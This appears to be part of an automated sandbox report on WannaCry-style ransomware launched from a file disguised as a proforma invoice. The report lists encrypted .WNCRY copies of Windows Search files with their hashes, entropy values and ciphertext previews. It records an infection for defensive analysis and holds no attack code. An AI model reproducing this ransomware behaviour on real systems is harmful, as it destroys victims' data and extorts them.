                                                          SHA-512:AFCA7B35827D49C69318F9F547E9540914D889666EB6BEC6E205FC2B92E154DA89D2D46F123DA8853189AC23E734597863A52EEA1596461343A6571097336760
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....g....0..1....@..XJ......}.y..`.^'B..BSG...V....../.s._t;.e7|^....Y......,.a.#.Nx.j...m..^-!.R...J...D........4#g/<>c.ba$........b.....'!s......@m..Q[...cD&=..Z.B.{FT..O~qB.e..>...)a...o........G....c.U.L..h.....\h....R)7....#+..t.*Q.t...+v..............C.%^.D`...,]..kG.........a....1X...F.f..&.TS....K........"..p..I-.....1...'zD.<...PH..&.........."...8.[.OC.p.2..4....`..L.P..D...Ak.:.oB!..e../'-W.@..;...K.....@....=+"r.4........3.."....x.k.KX.....^....+#...{...-.r{.C..........1...Mi......&.....S....m.....Q8,p9...e......f]]....o....7.....j..<#.4..].k...5..nc.."...KP!....=..h?.0....6V':.q.Y./.!.....2T?.W.....~B.....'..7.;Ts.If....V.H.ALk..."H,VZ.C...0a...H.?.Y4.z.dC...NK.+..[.J...(.OU&..U....ks.7..DV.5f..N...........K.'1..N....~.F....]?..j1MT%G..:.....Sq...-....u........h.$J......N<.,....n...k..n...wL.^Hq"..M..^...xn.s.g.j.l..E.=Nw...q..-m..#...,(.....Tt......U...K.(b....;.,.7bLe~o.\."......P.2.t..\..)B..).S*..>CNV.%..9....t..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingssynonyms.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):104008
                                                          Entropy (8bit):7.998472946641516
                                                          Encrypted:true
                                                          SSDEEP:3072:/M11sweffIlUKV23JZ9bgTlKOa7+rgBEv0ssD4ipG:01swe3gU33JZ9UT3rgqJgG
                                                          MD5:64506F302DDD55E18132BB1BADAB97CC
                                                          SHA1:3DB1F5AB545856D5742C82355B30884EBD5FB39F
                                                          SHA-256:63FAA009E12F488AF679D379FD05EDDB531F55C84AE0235A7D42DBC2598A1972
                                                          SHA-512:4EDFB8E050C0C59B189183C53357E5C30DE75D77160AD39F63274C9F50EC4892DF1AFE7680A62076CDB2B46AC1D9DF2AFEC7BDC310E5B1AB4C863F77DF1D0588
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....l....>.i.bR.I..G...Q.\}..F....+%...?....p}...^"VO(L&31.0+J}...~..t..`.........NIy..7'\..ag^`,2.kM...3...t.U.T..#./.U`C.i...QM..7...sEt....:$...5/.z..q.-....F.].....&.a?.P....+.....a=62.d.e.....1.;...\..G1.>..x.g.v.i..d.9....YJ.7f..v|..pqpt...7!......"....%........l...)0.g..z.aw......3*..%.... ..*(.P..H."<ct..U.]E,.....S.R...O.>.|.].-.z..4d...l.u~8...ST...D...w....*@.z.\..Em/Rp~.L#....$.......C...1I.n4D.V...g....d.>.vf...6t.P....>v...M.m4..%..$.*..(..d..4.5.`q.t....6.E^W..&.l....2.%/K.i.......1...Q...Z..V..{...t.(8 .U@{.6.C......[.`..[.<L).s!...].....e..).....v.H...x(.$....(0...0.v".7...V..]4.....t..<AX0#..U.F...(.^..w..H..3.....J.w...!3.3d.^.j:oD..P..U.D.....5E..._O.f..R....-.q.m"..n..K.....m.....7.....6zxoto..jR.w......6N...\.M..U.i..S_.c....7....=.\...].e..EM|.\......E..3....Cs3$....b.l.'..As..kh.................cu.0....HS.K......\..4.!.L/#....X....i.@y..D ..3....b..`6...*....@*.o.....h....3J...F.RI.........E.<..).$l.P..lf".9+m.q..E.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingssynonyms.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):104008
                                                          Entropy (8bit):7.998472946641516
                                                          Encrypted:true
                                                          SSDEEP:3072:/M11sweffIlUKV23JZ9bgTlKOa7+rgBEv0ssD4ipG:01swe3gU33JZ9UT3rgqJgG
                                                          MD5:64506F302DDD55E18132BB1BADAB97CC
                                                          SHA1:3DB1F5AB545856D5742C82355B30884EBD5FB39F
                                                          SHA-256:63FAA009E12F488AF679D379FD05EDDB531F55C84AE0235A7D42DBC2598A1972
                                                          SHA-512:4EDFB8E050C0C59B189183C53357E5C30DE75D77160AD39F63274C9F50EC4892DF1AFE7680A62076CDB2B46AC1D9DF2AFEC7BDC310E5B1AB4C863F77DF1D0588
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....l....>.i.bR.I..G...Q.\}..F....+%...?....p}...^"VO(L&31.0+J}...~..t..`.........NIy..7'\..ag^`,2.kM...3...t.U.T..#./.U`C.i...QM..7...sEt....:$...5/.z..q.-....F.].....&.a?.P....+.....a=62.d.e.....1.;...\..G1.>..x.g.v.i..d.9....YJ.7f..v|..pqpt...7!......"....%........l...)0.g..z.aw......3*..%.... ..*(.P..H."<ct..U.]E,.....S.R...O.>.|.].-.z..4d...l.u~8...ST...D...w....*@.z.\..Em/Rp~.L#....$.......C...1I.n4D.V...g....d.>.vf...6t.P....>v...M.m4..%..$.*..(..d..4.5.`q.t....6.E^W..&.l....2.%/K.i.......1...Q...Z..V..{...t.(8 .U@{.6.C......[.`..[.<L).s!...].....e..).....v.H...x(.$....(0...0.v".7...V..]4.....t..<AX0#..U.F...(.^..w..H..3.....J.w...!3.3d.^.j:oD..P..U.D.....5E..._O.f..R....-.q.m"..n..K.....m.....7.....6zxoto..jR.w......6N...\.M..U.i..S_.c....7....=.\...].e..EM|.\......E..3....Cs3$....b.l.'..As..kh.................cu.0....HS.K......\..4.!.L/#....X....i.@y..D ..3....b..`6...*....@*.o.....h....3J...F.RI.........E.<..).$l.P..lf".9+m.q..E.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{615928dd-022f-4339-b734-9a8a7fd59f58}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):217800
                                                          Entropy (8bit):7.999195528987239
                                                          Encrypted:true
                                                          SSDEEP:6144:1ARb7YxoX/lfgEqsTZCHncza8L7KWJIKVO/u1uOcQXT9QK:a0mNfgEqFncLKOA/Y2I+K
                                                          MD5:9C68F46B6C043C49E75BCDCD6A7FE4A1
                                                          SHA1:1402532FFDDF1F5239F4F51B7A4733EE5E8FA6BA
                                                          SHA-256:6AF4EC05B2A32D049316C286B9734D05ED7D6133FC7B6D88B07FF4F44F71FD29
                                                          SHA-512:E96BBD751DE982757F430A52C7486EA6B1D177F6CD9A13643ACB55EB443BD1DD27BAA455FFAF11EFE84EE464CE0559C8B68EEFDD493EB1F71C30F33AC1CF91F9
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....q qJ.....V_........../.b......).../4."...^gW...]....H.U..P......6.2.?......].x..5WE.5.Fz:...,.-...Y....G...}.s.D&..g(.[....].C../.G......0<.Nd*N...I./...aC.}..ze.'.;.M..5p&.b+l3..YT..q..&?.:...y.....UUu.........$B..\.:HV.B<'......J.....FR/...6x..d.....Q......V...[..:}..X7..a ...........J.Kl..~|...A..........@!8..UR.r;r .."0.(.*j.u..%,ix_.6.)..c..r.f...'3.....w..qf.}K.+..b}.<.._.>..[..W..TEA....Y3...;...s.b.x.<.:..zaa...h...6...F...5...,O...5B."w.(.>.P..*....^.......&.8Ti....r...%f........*.8v.J.....\..z..b.....oU.i.kp"P.BUD...5....9.....8XT....^X.....%%.Tu.2.|Gl...`5..B.n..........;....1...y.".....n..V....n....~.z.:.. $.T..._..H.{D..h..e..!.He.:.."O.[.lH.U9.h)......Tt.....|..ij...\......W.CN.u.k...gEa.0...I1..JG...'S.<...Ky.]..8....O..f.:/..<..|...#..4....k...i...r.;.....5V?....KR..P....=....1.o%.l..Z+..W..>.C=......Z...\5....9...B..h...2o.W...J.D..5.m..;.:.?. .M.....W.m...%.h....9cm.gLS/.d....O...k.5..W/.....@.^...u;..U.hY......

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{615928dd-022f-4339-b734-9a8a7fd59f58}\0.0.filtertrie.intermediate.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):217800
                                                          Entropy (8bit):7.999195528987239
                                                          Encrypted:true
                                                          SSDEEP:6144:1ARb7YxoX/lfgEqsTZCHncza8L7KWJIKVO/u1uOcQXT9QK:a0mNfgEqFncLKOA/Y2I+K
                                                          MD5:9C68F46B6C043C49E75BCDCD6A7FE4A1
                                                          SHA1:1402532FFDDF1F5239F4F51B7A4733EE5E8FA6BA
                                                          SHA-256:6AF4EC05B2A32D049316C286B9734D05ED7D6133FC7B6D88B07FF4F44F71FD29
                                                          SHA-512:E96BBD751DE982757F430A52C7486EA6B1D177F6CD9A13643ACB55EB443BD1DD27BAA455FFAF11EFE84EE464CE0559C8B68EEFDD493EB1F71C30F33AC1CF91F9
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....q qJ.....V_........../.b......).../4."...^gW...]....H.U..P......6.2.?......].x..5WE.5.Fz:...,.-...Y....G...}.s.D&..g(.[....].C../.G......0<.Nd*N...I./...aC.}..ze.'.;.M..5p&.b+l3..YT..q..&?.:...y.....UUu.........$B..\.:HV.B<'......J.....FR/...6x..d.....Q......V...[..:}..X7..a ...........J.Kl..~|...A..........@!8..UR.r;r .."0.(.*j.u..%,ix_.6.)..c..r.f...'3.....w..qf.}K.+..b}.<.._.>..[..W..TEA....Y3...;...s.b.x.<.:..zaa...h...6...F...5...,O...5B."w.(.>.P..*....^.......&.8Ti....r...%f........*.8v.J.....\..z..b.....oU.i.kp"P.BUD...5....9.....8XT....^X.....%%.Tu.2.|Gl...`5..B.n..........;....1...y.".....n..V....n....~.z.:.. $.T..._..H.{D..h..e..!.He.:.."O.[.lH.U9.h)......Tt.....|..ij...\......W.CN.u.k...gEa.0...I1..JG...'S.<...Ky.]..8....O..f.:/..<..|...#..4....k...i...r.;.....5V?....KR..P....=....1.o%.l..Z+..W..>.C=......Z...\5....9...B..h...2o.W...J.D..5.m..;.:.?. .M.....W.m...%.h....9cm.gLS/.d....O...k.5..W/.....@.^...u;..U.hY......

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{615928dd-022f-4339-b734-9a8a7fd59f58}\0.1.filtertrie.intermediate.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.20899371547493
                                                          Encrypted:false
                                                          SSDEEP:6:bkEGMC1a9LcAyf5q+T2K6SEUkoV6EunVocde9LruvlPFHGa:bkEHNyfI+t6nUdvuniQuCvzHr
                                                          MD5:56C08B2D0B927FBB56F70A16C2E3863E
                                                          SHA1:7146BF809BFB2ECA667E3A6CEC131F3CD3E90CDB
                                                          SHA-256:FF7623202E10E9B96EBA99C8A78827ABE7EF6794A7A26714C909C2E2674B3954
                                                          SHA-512:89A629B82AC7EC5B4447217833206AC26E1A868E2A536D052EF9BA7B91F4AC436C394A7858DDA31510239FD22567B0770825F2987AB8A6CC9AA8B8B841A51B04
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...."p...R........gi...,>.......H.s....>_.i.^.d\.....\=.....M...Z~TCR_.`X..........;4o.|b..t.5.+.......-...CG...|.U.wH.....?....I....e.....:..N...@.-m..Bs.....h7..TP:......u.+...0...L<f.R.1%v...(4Y..?......).wd*x..~. ....2.....1SB......P.O.3*.............GXys......E|0i

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{615928dd-022f-4339-b734-9a8a7fd59f58}\0.1.filtertrie.intermediate.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.20899371547493
                                                          Encrypted:false
                                                          SSDEEP:6:bkEGMC1a9LcAyf5q+T2K6SEUkoV6EunVocde9LruvlPFHGa:bkEHNyfI+t6nUdvuniQuCvzHr
                                                          MD5:56C08B2D0B927FBB56F70A16C2E3863E
                                                          SHA1:7146BF809BFB2ECA667E3A6CEC131F3CD3E90CDB
                                                          SHA-256:FF7623202E10E9B96EBA99C8A78827ABE7EF6794A7A26714C909C2E2674B3954
                                                          SHA-512:89A629B82AC7EC5B4447217833206AC26E1A868E2A536D052EF9BA7B91F4AC436C394A7858DDA31510239FD22567B0770825F2987AB8A6CC9AA8B8B841A51B04
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...."p...R........gi...,>.......H.s....>_.i.^.d\.....\=.....M...Z~TCR_.`X..........;4o.|b..t.5.+.......-...CG...|.U.wH.....?....I....e.....:..N...@.-m..Bs.....h7..TP:......u.+...0...L<f.R.1%v...(4Y..?......).wd*x..~. ....2.....1SB......P.O.3*.............GXys......E|0i

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{615928dd-022f-4339-b734-9a8a7fd59f58}\0.2.filtertrie.intermediate.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.150633720622366
                                                          Encrypted:false
                                                          SSDEEP:6:bkEcB2Ln2R6lvfyuZAkLi97U2V4PmjpKZVX2j4Gx29i2ScFfvg2mN:bkEcB2L2clvPAku74Pmt8Gxglvc
                                                          MD5:72E16C6935ABC10BAEA76AA29F3F81FF
                                                          SHA1:BD7AD98157BD5E9875CFB0BC81338949ADF0EEDA
                                                          SHA-256:093A7AE361E1DED3975946BECBEA664543A4DB09ADE319C14663434F2675BD85
                                                          SHA-512:216A816A33F047A43F08653C94199BDFCD9D8B0DF5B3DD2EE6BEB89652948FA63A0E4BE855418B22F8A7032DE39C3001F350D31424F2C3EFE6CC3AE2045B2FB0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....S.V5.fNE........J^.].:...Vn.....M.(Q.}e...8.....s...J.i......e...#.,......+...If.t..G.hF.Q!..u..2E.=.....5.../B.O.@..N....p.......H......2<.|..wA.5.n+.Z....M.S..[uY.....e!</.u..!.z.tF.X..!...N.Z..c.*....3..M]............9'..&...?DU@3.............h-H.....h..`.H..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{615928dd-022f-4339-b734-9a8a7fd59f58}\0.2.filtertrie.intermediate.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.150633720622366
                                                          Encrypted:false
                                                          SSDEEP:6:bkEcB2Ln2R6lvfyuZAkLi97U2V4PmjpKZVX2j4Gx29i2ScFfvg2mN:bkEcB2L2clvPAku74Pmt8Gxglvc
                                                          MD5:72E16C6935ABC10BAEA76AA29F3F81FF
                                                          SHA1:BD7AD98157BD5E9875CFB0BC81338949ADF0EEDA
                                                          SHA-256:093A7AE361E1DED3975946BECBEA664543A4DB09ADE319C14663434F2675BD85
                                                          SHA-512:216A816A33F047A43F08653C94199BDFCD9D8B0DF5B3DD2EE6BEB89652948FA63A0E4BE855418B22F8A7032DE39C3001F350D31424F2C3EFE6CC3AE2045B2FB0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....S.V5.fNE........J^.].:...Vn.....M.(Q.}e...8.....s...J.i......e...#.,......+...If.t..G.hF.Q!..u..2E.=.....5.../B.O.@..N....p.......H......2<.|..wA.5.n+.Z....M.S..[uY.....e!</.u..!.z.tF.X..!...N.Z..c.*....3..M]............9'..&...?DU@3.............h-H.....h..`.H..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{af177fd8-4436-44f8-b660-59b1d73126a6}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):217800
                                                          Entropy (8bit):7.999175669001736
                                                          Encrypted:true
                                                          SSDEEP:6144:G6DPR/Hf4X4tRuMxWfZ82C+cN+5yCt+mzT/:TDhwqRurR4+0yy4zT/
                                                          MD5:F7DAC19E137B24E0FE77185D23795F92
                                                          SHA1:1B73B5725B018B5E54F5325CE063345BC86A40F1
                                                          SHA-256:C8B004EEE168AA77D57D5836AB11CF6F02D0E9DA9CD068ED187492CAD1F14B82
                                                          SHA-512:A45153ACA4CC2EA49E762AD73160C04CA9E24108DD7F932296D7A6A117E7512D2F119FCF5E439491136EF93805AB71AF68C5DB8F792B2CECAADF26E8863E6842
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....R...{....A........ZQ.9.*.g.|....B..[..~....2..vz..j._....?$..b.a.>s..|.>.....s...T..tN..).9........1.j6c'..Ig...<c..*.P4o..9.KD..P1.Z.....H..9.NbY57E.......~....D5.bmgD......5......2..Hzv......n..vb.8?.....U.=f...Z...i.R...G...T....$(..f6.Z.....Q.......>.4..B....xki..(....K89..+...R....Jl..T."...cRk.##|..#...}.~...:.Z25..k..G...t...M.....m...... .~...."r...|./.b#m...1...K..D...)5!...GL3...9......X9E.k.k.*pz.!D..&......6"...[|.p.j^.?.G=$...T.....i',..2a...lh.v...l.f<)...r.w.....P.`.v.....u..n{H...u.7..pMxm.Sa...oZ~..!.&....>.N.y9@e..i..Z.~.|W..r.>oS.\....pf.....1..)4..o..m..6....l....~... ...vz{.>..].^@oe...K...F...N...quY...!.Vh..C...D.|..F9.y|..?N.}[j.a...7...%=S].K.r...@..N..A....E.p.X$N.....H......o.V...?H.d./.qJ..(.P\/.-ya.O..JI*?)b.%j3...`.........>...P.+j.q..9p'.....Sq|E.....v.g.a...;..$..Nl...`u....j.K...j....K....Q.....P...DXj..]..........Q. ...^H\..J.Uo.5....;.[.x...../.Y.1....(..k.G.._.<K..OB.[p-i.).(...2y&.<.}9..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{af177fd8-4436-44f8-b660-59b1d73126a6}\0.0.filtertrie.intermediate.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):217800
                                                          Entropy (8bit):7.999175669001736
                                                          Encrypted:true
                                                          SSDEEP:6144:G6DPR/Hf4X4tRuMxWfZ82C+cN+5yCt+mzT/:TDhwqRurR4+0yy4zT/
                                                          MD5:F7DAC19E137B24E0FE77185D23795F92
                                                          SHA1:1B73B5725B018B5E54F5325CE063345BC86A40F1
                                                          SHA-256:C8B004EEE168AA77D57D5836AB11CF6F02D0E9DA9CD068ED187492CAD1F14B82
                                                          SHA-512:A45153ACA4CC2EA49E762AD73160C04CA9E24108DD7F932296D7A6A117E7512D2F119FCF5E439491136EF93805AB71AF68C5DB8F792B2CECAADF26E8863E6842
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....R...{....A........ZQ.9.*.g.|....B..[..~....2..vz..j._....?$..b.a.>s..|.>.....s...T..tN..).9........1.j6c'..Ig...<c..*.P4o..9.KD..P1.Z.....H..9.NbY57E.......~....D5.bmgD......5......2..Hzv......n..vb.8?.....U.=f...Z...i.R...G...T....$(..f6.Z.....Q.......>.4..B....xki..(....K89..+...R....Jl..T."...cRk.##|..#...}.~...:.Z25..k..G...t...M.....m...... .~...."r...|./.b#m...1...K..D...)5!...GL3...9......X9E.k.k.*pz.!D..&......6"...[|.p.j^.?.G=$...T.....i',..2a...lh.v...l.f<)...r.w.....P.`.v.....u..n{H...u.7..pMxm.Sa...oZ~..!.&....>.N.y9@e..i..Z.~.|W..r.>oS.\....pf.....1..)4..o..m..6....l....~... ...vz{.>..].^@oe...K...F...N...quY...!.Vh..C...D.|..F9.y|..?N.}[j.a...7...%=S].K.r...@..N..A....E.p.X$N.....H......o.V...?H.d./.qJ..(.P\/.-ya.O..JI*?)b.%j3...`.........>...P.+j.q..9p'.....Sq|E.....v.g.a...;..$..Nl...`u....j.K...j....K....Q.....P...DXj..]..........Q. ...^H\..J.Uo.5....;.[.x...../.Y.1....(..k.G.._.<K..OB.[p-i.).(...2y&.<.}9..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{af177fd8-4436-44f8-b660-59b1d73126a6}\0.1.filtertrie.intermediate.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.053269467012793
                                                          Encrypted:false
                                                          SSDEEP:6:bkESvoGC7Mqk3qLryFRppj6SZvM4Dg1aX7LfzFStm3rS0t7L:bkEE73uryFRj611QfcqlL
                                                          MD5:59851BD4AEC293313A020AFE15883FCE
                                                          SHA1:2F09444FADF022815FDF618FADF9669C9477A42C
                                                          SHA-256:273149E0868C4BE69CA1C39079F19F86A02358A2EC925BB2481F8EBC7BD9F0E8
                                                          SHA-512:DF01668D22DF6892A5D51A2F7E90578C785A91C5896676FBA54F6B7C865567B0F24DBC9719E4F74704A8BE0AD7DCDB121E4B7DEF1AEE55EBB4A43D944E437C38
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......'..!,. ....,...t.8.b..6Q.L...1.Em.s....H.........k.~.C......4..QUpU..6.W... ..Q......[...n-.....%,...j..I...3&u....o....~...o.k.h&..A..Nn......Q..{......N...?B2.y..).,.oK..*..C~O$... A.A.j..0.Fr.C4...A.yq.pW.3......m.."..u......z.....$.1....?..............W.[4......u&...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{af177fd8-4436-44f8-b660-59b1d73126a6}\0.1.filtertrie.intermediate.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.053269467012793
                                                          Encrypted:false
                                                          SSDEEP:6:bkESvoGC7Mqk3qLryFRppj6SZvM4Dg1aX7LfzFStm3rS0t7L:bkEE73uryFRj611QfcqlL
                                                          MD5:59851BD4AEC293313A020AFE15883FCE
                                                          SHA1:2F09444FADF022815FDF618FADF9669C9477A42C
                                                          SHA-256:273149E0868C4BE69CA1C39079F19F86A02358A2EC925BB2481F8EBC7BD9F0E8
                                                          SHA-512:DF01668D22DF6892A5D51A2F7E90578C785A91C5896676FBA54F6B7C865567B0F24DBC9719E4F74704A8BE0AD7DCDB121E4B7DEF1AEE55EBB4A43D944E437C38
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......'..!,. ....,...t.8.b..6Q.L...1.Em.s....H.........k.~.C......4..QUpU..6.W... ..Q......[...n-.....%,...j..I...3&u....o....~...o.k.h&..A..Nn......Q..{......N...?B2.y..).,.oK..*..C~O$... A.A.j..0.Fr.C4...A.yq.pW.3......m.."..u......z.....$.1....?..............W.[4......u&...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{af177fd8-4436-44f8-b660-59b1d73126a6}\0.2.filtertrie.intermediate.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.24319288120606
                                                          Encrypted:false
                                                          SSDEEP:6:bkE/B0Yi9Fy++cT10fdlm41YUqUYdTbyL4iiBSqnhUVHIv3Pd69Ty1rdfU/+eNqP:bkE/BzIc++cTae41jqUYRbY4iiBlMoc+
                                                          MD5:7DE50B0371ADF2F79581AF12971235EC
                                                          SHA1:DBE84D319D8A65CDC450CD5C154C97379AC257A9
                                                          SHA-256:C769FE0E890DF4E9A3F9DC8FC08BECCE43DC5101B84FB5B646A82951BDF65183
                                                          SHA-512:FE7C8FA29B84840959878AD0F2E24184B437824779AC4C05246AF2799EDFE47A7444260939D224D6640235A8E7CE40CD7CA3887247DAF99D36254634DC69B0D0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...........h...s\.V.( TN...^.:.Is...-.8..._6......&..>../....F._...P.....+....uo.E. .^...W.n2...U...o.........B.t{.V........w.M.`....nN/..fA;.O.=%+...7....29.o.&...c.(....=..NQJ....?...}4....Ja5A.....S....j_.....ZW...*..[.K.0..l.g.....76.K7.. ..........................x.n ..nZ....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{af177fd8-4436-44f8-b660-59b1d73126a6}\0.2.filtertrie.intermediate.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.24319288120606
                                                          Encrypted:false
                                                          SSDEEP:6:bkE/B0Yi9Fy++cT10fdlm41YUqUYdTbyL4iiBSqnhUVHIv3Pd69Ty1rdfU/+eNqP:bkE/BzIc++cTae41jqUYRbY4iiBlMoc+
                                                          MD5:7DE50B0371ADF2F79581AF12971235EC
                                                          SHA1:DBE84D319D8A65CDC450CD5C154C97379AC257A9
                                                          SHA-256:C769FE0E890DF4E9A3F9DC8FC08BECCE43DC5101B84FB5B646A82951BDF65183
                                                          SHA-512:FE7C8FA29B84840959878AD0F2E24184B437824779AC4C05246AF2799EDFE47A7444260939D224D6640235A8E7CE40CD7CA3887247DAF99D36254634DC69B0D0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...........h...s\.V.( TN...^.:.Is...-.8..._6......&..>../....F._...P.....+....uo.E. .^...W.n2...U...o.........B.t{.V........w.M.`....nN/..fA;.O.=%+...7....29.o.&...c.(....=..NQJ....?...}4....Ja5A.....S....j_.....ZW...*..[.K.0..l.g.....76.K7.. ..........................x.n ..nZ....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410568410610122.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):101816
                                                          Entropy (8bit):7.998414227061809
                                                          Encrypted:true
                                                          SSDEEP:1536:0qSUdSM9lTGklTktNjVJNn/MK0xCeLYfLK5AFkiXATLsyIbh8a86+GjHok0CIGMw:0kdSM9lXTIXd/MD88YjyQKfSbSG7571
                                                          MD5:D507FE8C2A8E8343CAA7C3F4B379B0EF
                                                          SHA1:742E895E2185AD54B571750E739EFBFA3005DB33
                                                          SHA-256:1D5D0BB2AFE8232867492C3F4054920FA0DFD6148C82C53D8E05763706C28668
                                                          SHA-512:4500B0CD98B88EDEF9DA957E4AF72D1BAC0D83189B0DB21981FC20A0970F14D681B13D546FBC4E192542A3DFB39E281C0FF2B48AFEC4A8889EA529886A3EF4A1
                                                          Malicious:true
                                                          Reputation:unknown
